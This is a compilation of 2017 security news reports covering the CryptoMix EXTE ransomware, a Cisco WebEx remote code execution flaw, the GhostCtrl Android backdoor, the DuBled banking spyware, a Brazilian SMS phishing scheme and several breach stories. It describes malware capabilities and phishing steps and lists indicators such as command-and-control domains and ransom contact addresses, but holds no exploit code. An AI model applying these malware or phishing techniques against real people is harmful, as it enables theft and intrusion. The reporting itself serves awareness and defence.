In July last year, the National Institute of Standards and Technology (NIST) started deprecating SMS 2-step verification, just months after security researchers published a paper revealing that vulnerabilities in the mechanism expose it to simple bypass attacks.

“Overall, this is being done because SMS text message verifications and one-time codes are more susceptible to phishing attempts by attackers. By relying on account authentication instead of SMS, administrators can be sure that their mobile policies will be enforced on the device and authentication is happening through an encrypted connection,” Google notes.

According to the company, only 2-SV SMS users will receive the notification to test Google prompts, meaning that those using Security Key aren’t affected. The use of Google prompt requires a data connection. On iOS devices, it also requires the Google Search app to be installed. Enterprise edition domains can enforce security keys for more advanced security requirements.

“While users may opt out of using phone prompts when shown the promotion, users will receive follow-up notifications to switch after 6 months,” the company concludes.


CryptoMix Ransomware Variant EXTE Emerges

18.7.2017 securityweek Ransomware

A new variant of the CryptoMix ransomware was recently observed, appending the .EXTE extension to targeted files, security researchers warn.

Around for over a year, the CryptoMix ransomware family has seen numerous updates over time, but few major changes appear to have been added to it: although the ransom note and the used extension suffered modifications, the encryption method remained nearly the same from one variant to the other.

Once executed on the victim’s computer, the ransomware drops a file in the ApplicationData folder, while also dropping the ransom note in the targeted files’ folders. The malware also adds a series of registry keys, creates a unique ID and sends it to a remote location, after which it starts encrypting files using AES encryption.

In the ransom note, the malware demands users to contact the author via provided email addresses, while also asking them to pay the ransom amount in Bitcoins.

Discovered by Malwarebytes’ Marcelo Rivero, the latest malware variant uses the same encryption method as previous iterations, but does show some small updates, BleepingComputer’s Lawrence Abrams reveals.

The threat now adds the .EXTE extension to the encrypted files’ encrypted file name, while using a new ransom note named _HELP_INSTRUCTION.TXT (last year, CryptoMix used the HELP_YOUR_FILES.TXT ransom note). In this campaign, users are required to contact the ransomware authors at exte1@msgden.net, exte2@protonmail.com, and exte3@reddithub.com for payment information.

Earlier this month, a different variant of the malware was observed appending the .AZER extension to the encrypted files and using the _INTERESTING_INFORMACION_FOR_DECRYPT.TXT ransom note and webmafia@asia.com and donald@trampo.info email addresses.

Unlike previous variants, the AZER CryptoMix iteration performs no network communication and is completely offline. It embeds ten different RSA-1024 public encryption keys and uses one of them to encrypt the AES key it uses to encrypt the files.

The EXTE version, Abrams points out, also embeds the ten public RSA keys, meaning it too can work offline. The two variants emerged about one week of each other, which shows that the actor behind this ransomware variant is highly active. Since the beginning of this year, at least three other CryptoMix variants emerged: Wallet, CryptoShield, and Mole02.


Critical WebEx Flaws Allow Remote Code Execution

18.7.2017 securityweek Vulnerebility

Cisco has updated the WebEx extensions for Chrome and Firefox to address critical remote code execution vulnerabilities identified by researchers working for Google and Divergent Security.

Google Project Zero’s Tavis Ormandy and Cris Neckar of Divergent Security, a former member of the Chrome Security Team, discovered earlier this month that the WebEx extension allows a remote attacker to execute arbitrary code with the privileges of the web browser due to some changes made recently by Cisco.

The security holes, tracked as CVE-2017-6753, were reported to the networking giant on July 6 and they were addressed roughly one week later with the release of version 1.0.12. On Monday, both Cisco and Google Project Zero published advisories detailing the flaws.

According to Cisco, the vulnerabilities are caused by a “design defect” and they can be exploited by an attacker by getting the targeted user to visit a specially crafted webpage. The browser extensions for WebEx Meetings Server, WebEx Centers and WebEx Meetings running on Windows are impacted.

Updates have also been released for the Internet Explorer version of the WebEx plugin, which shares components with the Chrome and Firefox versions, and the WebEx desktop application. Cisco has informed customers that workarounds are not available.

Cisco said it was not aware of any attacks exploiting the vulnerabilities. However, the advisory published by Google Project Zero includes technical details and a working exploit. It also includes details on how Cisco addressed the issues.

This is not the first time Ormandy has found a critical vulnerability in the WebEx plugins. The researcher discovered a remote code execution flaw in January, which led to Google and Mozilla temporarily removing the WebEx extension from their stores.

Cisco’s initial fix turned out to be incomplete and it took the company several days to release proper patches after Ormandy’s disclosure.


For the second time in the year, experts found a flaw in Cisco WebEx Extension
18.7.2017 securityaffairs
Vulnerebility

For the second time in a year, a highly critical remote code execution vulnerability was found in the Cisco WebEx Extension.
For the second time in a year, a highly critical remote code execution vulnerability, tracked as CVE-2017-6753, was discovered in the Cisco Systems WebEx browser extension for Chrome and Firefox. The vulnerability could be exploited by attackers to remotely execute malicious code on a target machine with the privileges of the affected browser.

“A vulnerability in Cisco WebEx browser extensions for Google Chrome and Mozilla Firefox could allow an unauthenticated, remote attacker to execute arbitrary code with the privileges of the affected browser on an affected system.” reads the security advisory published by CISCO. “This vulnerability affects the browser extensions for Cisco WebEx Meetings Server, Cisco WebEx Centers (Meeting Center, Event Center, Training Center, and Support Center), and Cisco WebEx Meetings when they are running on Microsoft Windows.”
Cisco WebEx is one of the most popular communication tools used by businesses and internet users for online meetings, webinars, and video conferences. The extension has roughly 20 million active users.

The impact of the flaw is severe if we consider that the extension has roughly more than 20 million installs.

The vulnerability was discovered by the popular Google Project Zero hacked Tavis Ormandy and Cris Neckar of Divergent Security. The CVE-2017-6753 RCE vulnerability is due to a designing bug in the WebEx browser extension, it could allow attackers to gain control of the affected system.

The exploitation of the vulnerability is quite simple, attackers just need to trick victims into visiting a web page containing specially crafted malicious code through the browser with affected WebEx browser extension installed.
“Earlier this week a former colleague from Chrome Security, Cris Neckar from Divergent Security, pointed out that there had been some changes to the way atgpcext worked, and it looked like there may be some new problems. I see several problems with the way sanitization works, and have produced a remote code execution exploit to demonstrate them,” Ormandy said. “This extension has over 20M [million] active Chrome users alone, FireFox and other browsers are likely to be affected as well.”
Cisco acknowledged the RCE flaw and has already patched it in the “Cisco WebEx Extension 1.0.12” update for Chrome and Firefox browsers.

It is important to highlight the absence of “workarounds that address this vulnerability.”
“Cisco has released software updates for Google Chrome and Mozilla Firefox that address this vulnerability. There are no workarounds that address this vulnerability.” continues the CISCO advisory.

According to the advisory, Apple’s Safari, Microsoft Internet Explorer, and Microsoft Edge are not affected by this RCE flaw. Cisco WebEx Productivity Tools, Cisco WebEx browser extensions for Mac or Linux, and Cisco WebEx on Microsoft Edge or Internet Explorer are not affected by the vulnerability.


Russian nation-state actors blamed for cyber attacks against Irish energy networks
18.7.2017 securityaffairs BigBrothers

Irish energy networks have been targeted by spear phishing attacks, Russian nation-state actors are the prime suspects for the cyber attacks.
Hackers have targeted Irish energy networks, senior engineers at the Electricity Supply Board (ESB), which supplies both Northern Ireland and the Republic, were targeted by spear phishing messages allegedly sent by a Russian threat actor linked to Russia’s GRU intelligence agency.
The news was reported by The Times, sources close to the newspaper confirmed that Russian nation state actors launched the attack to compromise control systems and take over the electricity grid.

“Hackers backed by the Russian government have attacked energy networks running the national grid in parts of the UK, The Times has learnt.” reported The Times.

“The hackers, who targeted the Republic of Ireland’s energy sector, intended to infiltrate control systems, security analysts believe. This would also have given them the power to knock out parts of the grid in Northern Ireland.”

Russian nation-state actors target ireland

Why Ireland?

Security experts believe that GRU hackers were testing their cyber capabilities against the country infrastructure. The nation state hackers may have been interested in destabilizing the country that also hosts European headquarters of IT giants like Apple, Google, and Facebook. US officials confirmed last week that Russian government hacking teams penetrated American nuclear and other energy companies.

The Ireland’s National Cyber Security Centre is investigating the cyber attack that according to the experts aimed to steal information and gather intelligence instead having sabotage purposes.

The news about the attack against the Irish energy networks was disclosed shortly after the FBI and Department of Homeland Security sent a joint alert to the energy sector warning of cyber attacks powered by Russian nation state actors against the US nuclear power plants.

According to the alert, “advanced, persistent threat actors” used spear phishing message to steal login credentials to access networks of companies in the energy industry,

According to a report on vulnerabilities in British defence released by the Royal United Services Institute (RUSI) earlier this month, the threat of cyber attacks continues to grow especially for Western satellite infrastructures. Military and civilian communications and GPS system could be targeted by hackers with a significant impact on the economy of the country.

Of course, Russia denied state-sponsored hackers have been involved in attacks against Western governments or Ukraine. President Putin blamed patriotic Russian hackers, for the interference with the 2016 Presidential Election.


Critical RCE Vulnerability Found in Cisco WebEx Extensions, Again — Patch Now!

17.7.2017 thehackernews Vulnerebility

A highly critical vulnerability has been discovered in the Cisco Systems’ WebEx browser extension for Chrome and Firefox, for the second time in this year, which could allow attackers to remotely execute malicious code on a victim's computer.
Cisco WebEx is a popular communication tool for online events, including meetings, webinars and video conferences that help users connect and collaborate with colleagues around the world. The extension has roughly 20 million active users.
Discovered by Tavis Ormandy of Google Project Zero and Cris Neckar of Divergent Security, the remote code execution flaw (CVE-2017-6753) is due to a designing defect in the WebEx browser extension.
To exploit the vulnerability, all an attacker need to do is trick victims into visiting a web page containing specially crafted malicious code through the browser with affected extension installed.
Successful exploitation of this vulnerability could result in the attacker executing arbitrary code with the privileges of the affected browser and gaining control of the affected system.
"I see several problems with the way sanitization works, and have produced a remote code execution exploit to demonstrate them," Ormandy said. "This extension has over 20M [million] active Chrome users alone, FireFox and other browsers are likely to be affected as well."
Cisco has already patched the vulnerability and released “Cisco WebEx Extension 1.0.12” update for Chrome and Firefox browsers that address this issue, though "there are no workarounds that address this vulnerability."
"This vulnerability affects the browser extensions for Cisco WebEx Meetings Server, Cisco WebEx Centers (Meeting Center, Event Center, Training Center, and Support Center), and Cisco WebEx Meetings when they are running on Microsoft Windows," Cisco confirmed in an advisory released today.
Download Cisco WebEx Extension 1.0.12
Chrome Extensions
Firefox Extension
In general, users are always recommended to run all software as a non-privileged user in an effort to diminish the effects of a successful attack.
Fortunately, Apple's Safari, Microsoft's Internet Explorer and Microsoft's Edge are not affected by this vulnerability.
Cisco WebEx Productivity Tools, Cisco WebEx browser extensions for Mac or Linux, and Cisco WebEx on Microsoft Edge or Internet Explorer are not affected by the vulnerability, the company confirmed.
The remote code execution vulnerability in Cisco WebEx extension has been discovered second time in this year.
Ormandy alerted the networking giant to an RCE flaw in the WebEx browser extension earlier this year as well, which even led to Google and Mozilla temporarily removing the add-on from their stores.


New IBM Z Mainframe Designed to "Pervasively Encrypt" Enterprise Data

17.7.2017 securityweek Safety

New IBM Z14 Mainframe Introduces Encryption Engine Capable of Running More Than 12 Billion Encrypted Transactions Per Day

The combination of an explosion in data breaches and increasingly severe regulatory requirements requires a new approach to security: the mainframe is back. IBM has announced its latest mainframe, the IBM z14, in what it calls "the most significant re-positioning of mainframe technology in more than a decade."

Photo of IBM Z14 Mainframe

Encryption is seen as the best solution for both data loss and regulatory compliance. But encryption is hard, requiring more time and processing power than most companies have at their disposal. At the same time, it is becoming an increasingly attractive solution. More than nine billion data records have been lost or stolen since 2013; and only 4% were encrypted. Next year, the General Data Protection Regulation (GDPR) could, in theory, impose fines of up to 4% of global turnover for the loss of unencrypted personal data.

Photo of IBM Z14 MainframeA second regulation requiring widespread encryption is the NYSDFS cyber security regulation. This states, "As part of its cybersecurity program, based on its Risk Assessment, each Covered Entity shall implement controls, including encryption, to protect Nonpublic Information held or transmitted by the Covered Entity both in transit over external networks and at rest." 'Nonpublic Information' could almost be interpreted as 'everything'. The automatic facility to encrypt everything in transit and at rest -- as does the IBM Z -- will make its capabilities particularly attractive to banks and financial institutions that are governed by the New York State Department of Financial Services.

Encryption, where possible, is the one single solution that can solve both data loss (if it's encrypted, it's not lost) and compliance. IBM discussed the problem with 150 of its clients over three years and came up with its solution: a new mainframe with sufficient power and versatility to provide pervasive encryption.

IBM Z, says the firm, makes it possible, for the first time, for organizations to pervasively encrypt data associated with an entire application, cloud service or database in flight or at rest with one click. "The standard practice today," it says, "is to encrypt small chunks of data at a time, and invest significant labor to select and manage individual fields." But this approach doesn't scale, so encryption is often incomplete and/or inaccurate.

Encryption is only a solution, of course, if the decryption keys are kept safe. IBM Z offers what the company calls 'tamper-responding encryption keys'. Keys are invalidated at any sign of intrusion, and can be restored in safety. This key management system is designed to meet Federal Information Processing Standards (FIPS) Level 4 standards, and can be extended beyond the mainframe to other devices such as storage systems and servers in the cloud.

IBM's solution has been to introduce more power into a new mainframe: a massive 7x increase in cryptographic performance over the previous generation z13 -- driven by a 4x increase in silicon dedicated to cryptographic algorithms. "This is 18x faster than compared x86 systems (that today only focus on limited slices of data)," it claims, "and at just five percent of the cost of compared x86-based solutions."

These aren't the only large numbers associated with the new mainframe -- IBM claims it features the world's fastest microprocessor running at 5.2GHz. A single system can support more than 12 billion encrypted transactions per day; supports the world's largest MongoDB instance with 2.5x faster NodeJS performance than compared x86-based platforms; two million Docker Containers; and 1000 concurrent NoSQL databases.

Few companies will want to pay mainframe prices for compliance alone. However, IBM is also previewing new Z/OS software that aids with private cloud service delivery, enabling owners to transition from an IT cost center to a value-generating service provider.

It is also being incorporated into the IBM Cloud, where it will initially be used as an encryption engine for cloud services, and to run IBM blockchain services in six new centers in Dallas, London, Frankfurt, Sao Paulo, Tokyo and Toronto.

"The powerful combination of IBM Z encryption and secure containers differentiates IBM Blockchain services on the cloud by supporting the trust models new blockchain networks require,” said Marie Wieck, general manager, IBM Blockchain. "Enterprise clients also benefit from the ease of use making management transparent to the application and the user."


Industry Massively Underinsured Against Global Cyber Attacks: Study

17.7.2017 securityweek Cyber

Industry is massively underinsured against a major global cyberattack -- which could trigger losses on a par with natural disasters such as Hurricane (Superstorm) Sandy. This is one of the main conclusions of a study conducted by Lloyds of London (the world's oldest insurance organization with more than 20% of the global cyber insurance market), and Cyence (a risk modeling firm).

The report, "Counting the cost: Cyber exposure decoded" (PDF), examines two attack scenarios. In the first, attackers make a malicious modification to a hypervisor controlling the cloud infrastructure, which causes multiple server failures in multiple cloud customers. In the second, a zero-day vulnerability affecting an operating system with 45% share of the market is obtained by unidentified criminal groups that attack vulnerable businesses for financial gain.

In the first (cloud) scenario, the projected losses range from $4.6 billion for a large event to $53.1 billion for an extreme event. In the second (zero-day) scenario, the projected losses range from $9.7 billion for a large event to $28.7 billion for an extreme event. However, the report also notes that losses could be much lower or very much higher: as low as $15.6 billion or as high as $121.4 billion for an extreme cloud event.

The uninsured gap could be as much as $45 billion for the cloud services scenario – meaning that less than a fifth (17%) of the economic losses are covered by insurance. The insurance gap could be as high as $26 billion for the mass vulnerability scenario – meaning that just 7% of economic losses are covered.

This represents both a major market opportunity for the cyber insurance industry, and a poor understanding of the financial risk level within industry. The warning comes just weeks after major global ransomware attacks (WannaCry and NotPetya) and a U.S. government warning to industrial firms about a hacking campaign targeting the nuclear and energy sectors.

This variation in projected costs is caused by the second major conclusion drawn by the study -- neither the security industry nor the underwriting industry yet has sufficient understanding of global cybersecurity risk to formulate accurate risk/exposure figures for insurance purposes.

For example, for motor insurance, the industry has many years of detailed data on motor accidents: types of vehicle, ages of drivers, geolocations and so on; all against a background of improving motor safety. Cyber security, however, has little such data in a market whose conditions are continually worsening with new and more sophisticated attackers. This is further complicated by a poor understanding of liability and risk aggregation in cyber liability.

"The doomsday scenarios painted in the report highlight the growing issue of cyber risk aggregation," suggests Pete Banham, cyber resilience expert at Mimecast. "By adopting a cloud strategy that seeks to reduce the number of vendors, organizations may be tipping towards short term cost savings at the expense of security."

"For the insurance industry to capitalize on the growing cyber market," notes the report, "insurers would benefit from a deeper understanding of the potential tail risk implicit in cyber coverage." At the same time, it suggests, "Risk managers could use the cyber-attack scenarios to see what impacts cyber-attacks might have on their core business processes, and plan what actions they could take to mitigate these risks."

"This report gives a real sense of the scale of damage a cyber-attack could cause the global economy," comments Inga Beale, CEO of Lloyd's. "Just like some of the worst natural catastrophes, cyber events can cause a severe impact on businesses and economies, trigger multiple claims and dramatically increase insurers' claims costs. Underwriters need to consider cyber cover in this way and ensure that premium calculations keep pace with the cyber threat reality."

It should be noted, however, that the cyber security industry -- which could be impacted if industry diverts its primary risk strategy from mitigation (buying security controls) to transference (buying insurance) -- has its doubts.

"These are big numbers," comments David Emm, principal security researcher at Kaspersky Lab; but they don't mean much unless terms such as ‘serious cyber-attack' are quantified. How can we assess the global cost of an attack? It could mean anything from a temporary interruption of service to the takeover of customer systems – with very different costs. It's important for companies to conduct their own risk assessment and develop a strategy that's designed to secure corporate systems and mitigate the risk of an attack on those systems."

Two years ago, Lloyd's predicted that a major successful attack against the U.S. power grid "would cause between $243 billion to more than $1 trillion in economic damage.


Intel, Defense Bills Amended to Include Russian Hacking

17.7.2017 securityweek BigBrothers

Intelligence and defense policy legislation passed last week shows that the United States government is increasingly concerned about cyberattacks, particularly attacks coming from Russia.

The National Defense Authorization Act (NDAA), which the House of Representatives passed on Friday, specifies the budget and expenditures of the U.S. Department of Defense (DoD).

The list of amendments for the fiscal year 2018 includes several issues related to cyber capabilities. One of the adopted amendments requires the DoD to update its cyber strategy, to require the president to create a strategy for using offensive cyber capabilities, and providing technical assistance to NATO members.

Other amendments include improvements to training, recruitment and retention of cyber personnel; the possibility to request additional resources if the House of Representatives is the victim of a cyberattack; and banning the DoD from working with telecoms firms that were “complicit” with cyberattacks attributed to North Korea.

Another amendment requires the DoD to help Ukraine improve its cyber security capabilities. This comes after the country’s energy sector was hit two times by damaging cyberattacks believed to have been sponsored by the Russian government.

Russia is the focus of several amendments, including the cyberattacks believed to have been launched by state-sponsored actors and the country’s propaganda and disinformation initiatives. The Secretary of Defense and the Director of National Intelligence will be required to provide Congress a report on all attempts to hack DoD systems in the past two years by threat groups linked to Russia.

The Intelligence Authorization Act for Fiscal Year 2018, which the House Permanent Select Committee on Intelligence unanimously advanced on Thursday, also references Russia.

The Intelligence Authorization Act, which authorizes funding for the U.S. intelligence community, requires the Director of National Intelligence to submit a report assessing the most significant Russian influence campaigns aimed at foreign elections.

Without specifically naming Russia, the bill also requires an unclassified advisory report on foreign counterintelligence and cybersecurity threats to federal election campaigns. This comes after the U.S. officially accused Russia of attempting to interfere with last year’s presidential election.

There have been several incidents recently involving the leakage of classified information from the intelligence community, including the Vault7 files by WikiLeaks. An amendment to the Intelligence Authorization Act requires officials to submit semiannual reports on investigations into unauthorized public disclosures of classified information.

Another hot topic covered by the Intelligence Authorization Act is related to the retention of vulnerabilities. This has been a highly debated subject, particularly after the recent WannaCry ransomware attacks, which leveraged an exploit developed by the NSA. Following the attacks, a group of lawmakers introduced a new bill, the PATCH Act, whose goal is to help the government decide whether or not it should release vulnerability details to non-federal entities.


OmniRAT-Based Android Backdoor Emerges

17.7.2017 securityweek Virus

A newly discovered Android backdoor appears to be based on the OmniRAT remote administration tool (RAT) that targets Android, Windows, Linux and MacOS devices, Trend Micro security researchers warn.

Dubbed GhostCtrl, the threat masquerades as a legitimate or popular application and uses the names App, MMS, whatsapp, and even Pokemon GO. When launched, however, the malicious Android Application Package (APK) is decoded and saved on the Android device.

The APK is dynamically clicked by a wrapper and the user is prompted to install it. The prompt, Trend Micro explains, won’t go away even if the user attempts to dismiss the message, thus eventually annoying the user into accepting the installation.

Once the installation has been completed, a service that helps the malicious code run in the background is launched. The backdoor function is usually named com.android.engine, in an attempt to mislead users into believing it is a legitimate system process.

The malware then connects to the command and control (C&C) server to retrieve commands, which the server sends encrypted, but the malicious APK decrypts them upon receipt.

Trend's security researchers also noticed that the backdoor connects to a domain rather than directly to the C&C server’s IP address, most probably in an attempt to obscure traffic. Several Dynamic Name Servers (DNS) the researchers discovered at some point led to the same C&C IP address: hef–klife[.]ddns[.]net, f–klife[.]ddns[.]net, php[.]no-ip[.]biz, and ayalove[.]no-ip[.]biz.

“A notable command contains action code and Object DATA, which enables attackers to specify the target and content, making this a very flexible malware for cybercriminals. This is the command that allows attackers to manipulate the device’s functionalities without the owner’s consent or knowledge,” Trend Micro says.

The malware can control the Wi-Fi state; monitor the phone sensors’ data in real time; set phone’s UiMode, like night mode/car mode; control the vibrate function; download pictures as wallpaper; list the file information in the current directory and upload it to the C&C; delete/rename a file in the indicated directory; upload a desired file to the C&C; create an indicated directory; use the text to speech feature (translate text to voice/audio); send SMS/MMS to a number; delete browser history or SMS; download a file; call a phone number; open activity view-related apps; control the system infrared transmitter; and run a shell command and upload the output result.

“Another unique C&C command is an integer-type command, which is responsible for stealing the device’s data. Different kinds of sensitive—and to cybercriminals, valuable—information will be collected and uploaded, including call logs, SMS records, contacts, phone numbers, SIM serial number, location, and browser bookmarks,” the researchers explain.

Compared to other Android info-stealers, GhostCtrl can pilfer a great deal of data in addition to the above: Android OS version, username, Wi-Fi, battery, Bluetooth, and audio states, UiMode, sensor, data from camera, browser, and searches, service processes, activity information, and wallpaper.

Furthermore, the malware can intercept text messages from phone numbers specified by the attacker and can record voice or audio and upload the recording to the C&C. All the stolen data is sent to the server encrypted.

The malware also includes a series of commands that aren’t usually seen in Android RATs, such as the option to clear/reset the password of an account, set the phone to play different sound effects, specify the content in the Clipboard, customize the notification and shortcut link, control the Bluetooth to search and connect to another device, or set the accessibility to TRUE and terminate an ongoing phone call.

The first GhostCtrl packed a framework to gain admin-level privilege, but had no function codes. These, however, were included in the subsequent variants, which also added an increasing number of features to be hijacked. The second version could also work as ransomware by locking the device’s screen and resetting the password, and could root the device. The third version, the security researchers say, includes obfuscation techniques to hide its malicious routines.

“GhostCtrl’s combination with an information-stealing worm, while potent, is also telling. The attackers tried to cover their bases, and made sure that they didn’t just infect endpoints. And with the ubiquity of mobile devices among corporate and everyday end users, GhostCtrl’s capabilities can indeed deliver the scares,” Trend Micro said.


Ashley Madison Offers $11 Million in Data Breach Settlement

17.7.2017 securityweek Hacking

Ruby Life Inc., the owner and operator of the online adultery service Ashley Madison, has offered to pay $11.2 million to individuals affected by the 2015 data breach.

Ashley Madison was breached in July 2015 by hackers who had threatened to leak the personal details of the website’s customers unless its owners shut down the service.

In mid-August, the hackers leaked details associated with well over 30 million user accounts, including names, addresses, phone numbers, email addresses, dates of birth, users’ interests and their physical description, password hashes, and credit card transactions. A few days later, they also dumped internal company files and emails.

The incident caused problems for a lot of people and there have been several suicides possibly related to the leak of Ashley Madison user data. Individuals affected by the breach filed class actions alleging inadequate data security practices and misrepresentations regarding the dating service.

In December 2016, Ruby, formerly named Avid Dating Life, agreed to pay a $1.6 million penalty to settle charges with the U.S. Federal Trade Commission (FTC) and state regulators for failing to protect confidential user information.

Ruby announced on Friday that it has also settled the customer lawsuits. If the settlement is approved by the court, the company will pay a total of $11.2 million to a fund that will be used to compensate customers who submitted valid claims for losses resulting from the 2015 data breach.

“While ruby denies any wrongdoing, the parties have agreed to the proposed settlement in order to avoid the uncertainty, expense, and inconvenience associated with continued litigation, and believe that the proposed settlement agreement is in the best interest of ruby and its customers,” Ruby stated.

Ruby also clarified that the identities of individuals who had signed up for Ashley Madison were not verified, allowing users to create accounts using other people's information.

“Therefore, ruby wishes to clarify that merely because a person's name or other information appears to have been released in the data breach does not mean that person actually was a member of Ashley Madison,” the company said.


Hundreds of Domains Hijacked From French Registrar Gandi

17.7.2017 securityweek Hacking

Hundreds of domains were hijacked earlier this month and redirected to an exploit kit landing page as part of an attack targeting the French domain name registrar and hosting services provider Gandi.

According to an incident report published by Gandi last week, the hacker attack involved one of its technical partners, which helps the company connect to some of the 200 registries that allow it to manage more than 2.1 million domain names across 730 top level domains (TLDs).

The attacker managed to obtain credentials to a web portal of this technical partner. It’s unclear how the credentials were stolen, but Gandi suspects that the data may have been intercepted from the HTTP connection to its partner’s portal. The company highlighted that its own systems or the infrastructure of its technical partner have not been breached.

Once they gained access to the web portal, the attacker modified the name servers for 751 domains in an effort to redirect their visitors to an exploit kit.

According to SWITCH, the registry for .ch (Switzerland) and .li (Liechtenstein) domain names, which had 94 of its domains hijacked, victims were redirected to the RIG exploit kit. One of the affected domains belongs to Swiss security firm SCRT, which also had its incoming emails redirected to a foreign mail server.

Gandi said it learned about the incident on July 7 from a registrar and immediately started reverting the changes made by the attacker. The company has also reset all login credentials to the platforms used to connect to registries and technical partners.

In the case of SCRT, the visitors of its website were only redirected to the exploit kit for roughly one hour, but Gandi said the unauthorized changes were in place for up to 11 hours, until all the updates made by the attackers were reversed.

Gandi determined that 18 SSL certificates were issued for the affected domains during the attacks, but its analysis showed that each of the certificates is legitimate.

This was not the only recent incident involving domain names. Earlier this month, a security researcher noticed that he could register several domain names that matched the authoritative name servers for the .io TLD.

While the researcher suggested that registering the domains could have allowed him to hijack most of the DNS traffic for the .io TLD, others pointed out that the outcome couldn’t have been as catastrophic as the researcher claimed.


Backdoor Uses FFmpeg Application to Spy on Victims

17.7.2017 securityweek Virus

A recently observed feature-rich backdoor is capable of spying on its victim’s activities by recording full videos with the help of the "FFmpeg" application, Malwarebytes warns.

Detected as Backdoor.DuBled and written in .NET, the malware is distributed through a JS file containing an executable that installs itself under a random. To achieve persistence, the threat uses a run key, while also dropping a copy of itself in the startup folder.

The threat downloads the legitimate applications Rar.exe and ffmpeg.exe, along with related DLLs (DShowNet.dll and DirectX.Capture.dll) and uses them for its nefarious operations, the security researchers reveal.

FFmpeg is described by its developers as a "complete, cross-platform solution to record, convert and stream audio and video."

During run, the malware creates unencrypted .tmp files inside its installation folder, containing keystrokes and logging the running applications. It was also observed closing and deleting some applications from the compromised machine, including ProcessExplorer and baretail.

Communication with the command and control (C&C) server is performed over TCP using port 98. Initial beaconing is performed by the server via a command “idjamel,” to which the threat responds with basic information about the victim machine, such as name/username, operating system, and a list of running processes.

Next, the server sends the configuration, which includes a list of targeted banks which the malware saves the list to registry. The C&C also sends a set of Base64 encrypted PE files, including non-malicious helper binaries, and a URL to download the FFmpeg application (but the link points to a dummy page when accessed).

The analyzed sample was packed with the help of CloudProtector, which decrypts the payload using a custom algorithm and a key supplied in the configuration. The decrypted executable is then loaded in memory using process hollowing (or the RunPE technique).

“The unpacked payload is the layer containing all the malicious features. It is not further obfuscated, so we can easily decompile it and read the code,” Malwarebytes explains.

The threat was designed to spy on users and backdoor the infected machines. It can record videos using the FFmpeg application, snap screenshots, and log keystrokes. The video recording event is triggered when the victim accesses a site related to online banking, which clearly reveals the final purpose of the threat’s authors: to spy on victims’ banking activities.

Recorded videos are sent to the C&C encoded in Base64, while the screenshots (saved as JPG) and captured logs are periodically compressed using the RAR application, and then sent to the server.

The malware can also enumerate opened windows and can disable anti-malware applications. What’s more, the bot’s functionality can be expanded with the help of plugins, which it downloads from the C&C.

Two of the plugins the malware downloaded during analysis provided it with capabilities typical for a RAT: processmanager.dl (written in 2015), and remotedesktop.dll (written in 2016). The latter plugin was obfuscated, although the main malware module and the former plugin weren’t.

“This malware is prepared by an unsophisticated actor. Neither the binary nor the communication protocol is well obfuscated. The used packer is well-known and easy to defeat. However, the malware is rich in features and it seems to be actively maintained. Its capabilities of spying on the victim and backdooring the attacked machine should not be taken lightly,” Malwarebytes concludes.


SMS Phishing induces victims to photograph its own token card
17.7.2017 securityaffairs
Phishing

Renato Marinho detailed an unusual SMS phishing campaign that hit Brazilian users. All started with an SMS message supposedly sent from his bank.
Introduction

Today I faced quite an unusual SMS phishing campaign here in Brazil. A friend of mine received an SMS message supposedly sent from his bank asking him to update his registration data through the given URL. Otherwise, he could have his account blocked, as seen in Figure 1.

SMS Phishing

Figure 1 – SMS message received

Telling you the truth, my friend doesn’t have any account on the informed bank and, even so, we know that those kinds of message are hardly ever sent by banks and are, most of the time, related to malware propagation and information stealing. However, instead of discarding the message, we decided to give it a try and the results, as you are going to read in this diary, surprised us. This campaign involves no malware propagation – just creativity in favor of evil.

SMS Phishing analysis

The link in the message aims to take the victim to a fake and very simplistic mobile version of a well-known bank website. First, it asks for the “CPF” (a kind of social security card number) and a password, as seen in Figure 2.

SMS Phishing

Figure 2 – Fake bank website asking for CPF and password

It is interesting noting that there is a data input validation. The user must obey to the CPF number composition rules otherwise he can’t proceed. This validation is done by the JavaScript code shown in Figure 3.

SMS Phishing

Figure 3 – CPF validation rules

This kind of validation is certainly used to give a bit of legitimacy to the fake website and, perhaps, to do not overload crooks with much “data-mining” work.

In the next page, the fake website informs that the device used on that connection needs to be authorized, as seen in Figure 4.

SMS Phishing

Figure 4 – Fake website: user must authorize the device

By clinking on “Habilitar Aparelho” which means “enable device”, a new page is shown asking for the victim to inform the 4-digit password, as seen in Figure 5.

SMS Phishing

Figure 5 – Fake website asking for the 4-digit password

Again, there is a minimum validation to avoid the user trying very simple passwords like “1234” as seen in Figure 6.

SMS Phishing

Figure 6 – 4-digit password “validation” code

Next, the step that caught our attention. The fake website asks the victim to take a picture of its token card and upload it. To be precisely, asks to take a picture of the side with all security codes used to validate banking transactions as a second-factor authenticator, as seen in Figure 7.

SMS Phishing

Figure 7 – Asking for the token card picture

By clicking on “Finalizar Habilitação” which means “proceed with the device authorization”, the victim’s smartphone will prompt the user to select a picture from its library or take a new one – which is exactly what the user is induced to do, as seen in Figure 8.

SMS Phishing

Figure 8 – Taking the token card picture

Once the victim ends up the whole process, including the token card picture, the criminals will have all the information needed to make fraudulent transactions on the compromised bank account and the user is forwarded to the real bank login page.

Final words

Using victim’s smartphone to take pictures to steal information or, who knows, things, scares me a little bit. I can explain. Earlier this month, reading Bruce Schneier’s blog I saw a post entitled “Now It’s Easier than Ever to Steal Someone’s Keys” [1] which says, “The website key.me will make a duplicate key from a digital photo.”.

While writing this diary, I was reported about similar SMS Phishing campaigns targeting other banks costumers here in Brazil. Stay tuned.

References

[1] https://www.schneier.com/blog/archives/2017/07/now_its_easier_.html


Ashley Madison to Pay $11.2 Million to Data Breach Victims
17.7.2017 thehackernews Incindent
Ashley Madison, an American most prominent dating website that helps people cheat on their spouses has been hacked, has agreed to an $11.2 Million settlement for roughly 37 million users whose personal details were exposed in a massive data breach two years ago.
Though the parent company of Ashley Madison, Ruby Corp., denies any wrongdoing, the company has pledged to pay around $3,500 to each of the hack's victims for the settlement.
The settlement has to be reviewed by a federal judge in St. Louis.
Ashley Madison marketed itself as a means to help people cheat on their spouses, with a tagline "Life is short. Have an affair."
The site was breached in July 2015 and hackers dumped nearly 100 gigabytes' worth of sensitive data belonging to 37 million users of the casual sex and marriage affair website onto the dark web.
The leaked data included victims' usernames, first and last names, email addresses, passwords, credit card data information, street names, phone numbers, and transactions records, which led to blackmails and even suicides.
The 2015 data breach cost Ruby Corp, formerly known as Avid Life, over a quarter of its revenue and forced the Toronto-based company to spend millions of dollars to boost security and user privacy.
Ruby Corp was already forced to pay $1.66 Million to settle charges from Federal Trade Commission (FTC) and 13 states, alleging that the service misled its consumers about its privacy policy and didn't do enough to protect their information.
